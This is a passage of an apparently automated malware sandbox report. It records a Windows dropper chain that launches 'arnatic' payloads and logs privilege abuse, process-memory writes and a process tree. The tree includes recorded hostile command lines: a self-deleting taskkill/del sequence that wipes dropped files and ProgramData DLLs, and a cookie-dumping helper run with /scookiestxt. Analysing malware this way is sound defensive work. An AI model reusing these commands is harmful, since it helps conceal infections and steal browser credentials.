Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	Process not Found
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 90dce8101673d701	MicrosoftEdge.exe

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	621	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	622	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	623	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	629	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	630	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	631	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	455	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	461	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3172	rUNdlL32.eXe
3172	rUNdlL32.eXe
3900	svchost.exe
3900	svchost.exe
1252	arnatic_2.exe
1252	arnatic_2.exe
4732	jfiag3g_gg.exe
4732	jfiag3g_gg.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
3144	3081054.exe
3144	3081054.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
3876	1126656.exe
3876	1126656.exe
4176	5925079.exe
4176	5925079.exe
3876	1126656.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2756	Process not Found

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
1252	arnatic_2.exe
5480	MrGh6bEH0L0a.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756	Process not Found
2756	Process not Found
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756	Process not Found
2756	Process not Found
2928	explorer.exe
2928	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756	Process not Found
2756	Process not Found
5468	explorer.exe
5468	explorer.exe
2756	Process not Found
2756	Process not Found
5468	explorer.exe
5468	explorer.exe
5784	explorer.exe
5784	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756	Process not Found
2756	Process not Found
5468	explorer.exe
5468	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

pid	Process
5244	5145379.exe
6516	8933555.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1584	arnatic_5.exe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3900	svchost.exe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3876	1126656.exe
Token: SeDebugPrivilege	4176	5925079.exe
Token: SeDebugPrivilege	208	arnatic_7.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
2756	Process not Found
2756	Process not Found
8	chrome.exe
8	chrome.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
5492	irecord.tmp
6780	Setup3310.tmp
2756	Process not Found
2756	Process not Found
7556	prolab.tmp
7504	ultramediaburner.tmp
744	Setup3310.tmp
7748	Setup3310.tmp
8196	Setup3310.tmp
5168	libravpn_setup.tmp
6796	LibraVPN.exe
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found
2756	Process not Found

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2756	Process not Found
2756	Process not Found
2756	Process not Found
6796	LibraVPN.exe

Suspicious use of SetWindowsHookEx 28 IoCs

pid	Process
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
2756	Process not Found
5444	Process not Found
6520	MicrosoftEdgeCP.exe
6520	MicrosoftEdgeCP.exe
8644	MicrosoftEdge.exe
6584	MicrosoftEdgeCP.exe
6584	MicrosoftEdgeCP.exe
6796	LibraVPN.exe
6796	LibraVPN.exe
8568	MicrosoftEdge.exe
6580	MicrosoftEdgeCP.exe
6580	MicrosoftEdgeCP.exe
5184	MicrosoftEdge.exe
9120	MicrosoftEdgeCP.exe
9120	MicrosoftEdgeCP.exe
9032	MicrosoftEdge.exe
2844	MicrosoftEdgeCP.exe
2844	MicrosoftEdgeCP.exe
3684	MicrosoftEdge.exe
5924	MicrosoftEdgeCP.exe
5924	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2756	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3540 wrote to memory of 1580	3540	setup_x86_x64_install - копия (20).exe	74
PID 3540 wrote to memory of 1580	3540	setup_x86_x64_install - копия (20).exe	74
PID 3540 wrote to memory of 1580	3540	setup_x86_x64_install - копия (20).exe	74
PID 1580 wrote to memory of 3672	1580	setup_installer.exe	76
PID 1580 wrote to memory of 3672	1580	setup_installer.exe	76
PID 1580 wrote to memory of 3672	1580	setup_installer.exe	76
PID 3672 wrote to memory of 1548	3672	setup_install.exe	79
PID 3672 wrote to memory of 1548	3672	setup_install.exe	79
PID 3672 wrote to memory of 1548	3672	setup_install.exe	79
PID 3672 wrote to memory of 4068	3672	setup_install.exe	80
PID 3672 wrote to memory of 4068	3672	setup_install.exe	80
PID 3672 wrote to memory of 4068	3672	setup_install.exe	80
PID 3672 wrote to memory of 3104	3672	setup_install.exe	81
PID 3672 wrote to memory of 3104	3672	setup_install.exe	81
PID 3672 wrote to memory of 3104	3672	setup_install.exe	81
PID 3672 wrote to memory of 3004	3672	setup_install.exe	82
PID 3672 wrote to memory of 3004	3672	setup_install.exe	82
PID 3672 wrote to memory of 3004	3672	setup_install.exe	82
PID 3672 wrote to memory of 3092	3672	setup_install.exe	83
PID 3672 wrote to memory of 3092	3672	setup_install.exe	83
PID 3672 wrote to memory of 3092	3672	setup_install.exe	83
PID 3672 wrote to memory of 2720	3672	setup_install.exe	85
PID 3672 wrote to memory of 2720	3672	setup_install.exe	85
PID 3672 wrote to memory of 2720	3672	setup_install.exe	85
PID 3672 wrote to memory of 3368	3672	setup_install.exe	84
PID 3672 wrote to memory of 3368	3672	setup_install.exe	84
PID 3672 wrote to memory of 3368	3672	setup_install.exe	84
PID 4068 wrote to memory of 1252	4068	cmd.exe	87
PID 4068 wrote to memory of 1252	4068	cmd.exe	87
PID 4068 wrote to memory of 1252	4068	cmd.exe	87
PID 3104 wrote to memory of 1128	3104	cmd.exe	86
PID 3104 wrote to memory of 1128	3104	cmd.exe	86
PID 3104 wrote to memory of 1128	3104	cmd.exe	86
PID 2720 wrote to memory of 3712	2720	cmd.exe	92
PID 2720 wrote to memory of 3712	2720	cmd.exe	92
PID 2720 wrote to memory of 3712	2720	cmd.exe	92
PID 1548 wrote to memory of 2164	1548	cmd.exe	91
PID 1548 wrote to memory of 2164	1548	cmd.exe	91
PID 1548 wrote to memory of 2164	1548	cmd.exe	91
PID 3092 wrote to memory of 1584	3092	cmd.exe	90
PID 3092 wrote to memory of 1584	3092	cmd.exe	90
PID 3004 wrote to memory of 3788	3004	cmd.exe	88
PID 3004 wrote to memory of 3788	3004	cmd.exe	88
PID 3004 wrote to memory of 3788	3004	cmd.exe	88
PID 3368 wrote to memory of 3804	3368	cmd.exe	89
PID 3368 wrote to memory of 3804	3368	cmd.exe	89
PID 3368 wrote to memory of 3804	3368	cmd.exe	89
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3788 wrote to memory of 3144	3788	arnatic_4.exe	99
PID 3788 wrote to memory of 3144	3788	arnatic_4.exe	99
PID 3788 wrote to memory of 3144	3788	arnatic_4.exe	99
PID 1128 wrote to memory of 3172	1128	arnatic_3.exe	95
PID 1128 wrote to memory of 3172	1128	arnatic_3.exe	95
PID 1128 wrote to memory of 3172	1128	arnatic_3.exe	95
PID 3172 wrote to memory of 3900	3172	rUNdlL32.eXe	69
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	93
PID 3172 wrote to memory of 2672	3172	rUNdlL32.eXe	27
PID 3900 wrote to memory of 3872	3900	svchost.exe	96

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:936
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  - Executes dropped EXE
  PID:6744
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:4340
- C:\Users\Admin\AppData\Roaming\rsrbfsf
  C:\Users\Admin\AppData\Roaming\rsrbfsf
  2⤵
  - Checks SCSI registry key(s)
  PID:5624
- C:\Users\Admin\AppData\Roaming\wirbfsf
  C:\Users\Admin\AppData\Roaming\wirbfsf
  2⤵
  PID:5084
- - C:\Users\Admin\AppData\Roaming\wirbfsf
    C:\Users\Admin\AppData\Roaming\wirbfsf
    3⤵
    - Checks SCSI registry key(s)
    PID:6464
- C:\Users\Admin\AppData\Roaming\jdrbfsf
  C:\Users\Admin\AppData\Roaming\jdrbfsf
  2⤵
  - Suspicious use of SetThreadContext
  - Checks SCSI registry key(s)
  PID:8900
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:7756
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:4324
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:6912
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:8496
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:6744
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:8928
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:3772
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:5408
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:7348
- C:\Users\Admin\AppData\Roaming\rsrbfsf
  C:\Users\Admin\AppData\Roaming\rsrbfsf
  2⤵
  - Checks SCSI registry key(s)
  PID:8436
- C:\Users\Admin\AppData\Roaming\wirbfsf
  C:\Users\Admin\AppData\Roaming\wirbfsf
  2⤵
  - Suspicious use of SetThreadContext
  PID:8800
- - C:\Users\Admin\AppData\Roaming\wirbfsf
    C:\Users\Admin\AppData\Roaming\wirbfsf
    3⤵
    - Checks SCSI registry key(s)
    PID:5080
- C:\Users\Admin\AppData\Roaming\jdrbfsf
  C:\Users\Admin\AppData\Roaming\jdrbfsf
  2⤵
  - Checks SCSI registry key(s)
  PID:3468
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:8004
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll",QRIvBFx
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  PID:8808
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:5564
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:6268
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:7144
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:636
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:1932
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:8892
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:2076
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:7152
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:4916
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:2988
- C:\Users\Admin\AppData\Roaming\rsrbfsf
  C:\Users\Admin\AppData\Roaming\rsrbfsf
  2⤵
  PID:3596
- C:\Users\Admin\AppData\Roaming\wirbfsf
  C:\Users\Admin\AppData\Roaming\wirbfsf
  2⤵
  PID:4452
- C:\Users\Admin\AppData\Roaming\jdrbfsf
  C:\Users\Admin\AppData\Roaming\jdrbfsf
  2⤵
  PID:3444
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:5644
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:5792
- C:\Users\Admin\AppData\Local\Temp\335C.exe
  C:\Users\Admin\AppData\Local\Temp\335C.exe
  2⤵
  PID:5252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3540
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1580
- - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3672
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_1.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1548
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exe
        
        arnatic_1.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2164
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
        6⤵
        
        PID:4212
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im arnatic_1.exe /f
        7⤵
        Kills process with taskkill
        
        PID:4280
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:1236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_2.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4068
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_2.exe
        
        arnatic_2.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_3.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3104
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_3.exe
        
        arnatic_3.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1128
      - C:\Windows\SysWOW64\rUNdlL32.eXe
        
        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
        6⤵
        Loads dropped DLL
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_4.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3004
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_4.exe
        
        arnatic_4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3788
      - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        
        PID:3144
      - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        Suspicious use of SetThreadContext
        
        PID:5084
      - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        6⤵
        
        PID:5084
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_5.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3092
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_5.exe
        
        arnatic_5.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1584
      - C:\Users\Admin\AppData\Roaming\1126656.exe
        
        "C:\Users\Admin\AppData\Roaming\1126656.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3876
      - C:\Users\Admin\AppData\Roaming\5925079.exe
        
        "C:\Users\Admin\AppData\Roaming\5925079.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4176
      - C:\Users\Admin\AppData\Roaming\3081054.exe
        
        "C:\Users\Admin\AppData\Roaming\3081054.exe"
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3144
      - C:\Users\Admin\AppData\Roaming\1100866.exe
        
        "C:\Users\Admin\AppData\Roaming\1100866.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:684
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:4644
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3368
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe
        
        arnatic_7.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3804
      - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_7.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c arnatic_6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2720
    - - C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_6.exe
        
        arnatic_6.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        
        PID:3712
      - C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe
        
        "C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4572
        
        C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe
        
        C:\Users\Admin\Documents\qeWffXXPdL7IgtmXJGM3uvPh.exe
        7⤵
        Executes dropped EXE
        
        PID:5004
      - C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
        
        "C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4304
        
        C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
        
        C:\Users\Admin\Documents\xLrZ7sMbOcUYQ6ZyqN_bIeZe.exe
        7⤵
        Executes dropped EXE
        
        PID:4636
      - C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe
        
        "C:\Users\Admin\Documents\cjG0Iam1Jj0cNNTd_SEVIp5b.exe"
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1128
      - C:\Users\Admin\Documents\n_XvoC0lA5U4xLfvwMUQ9ivc.exe
        
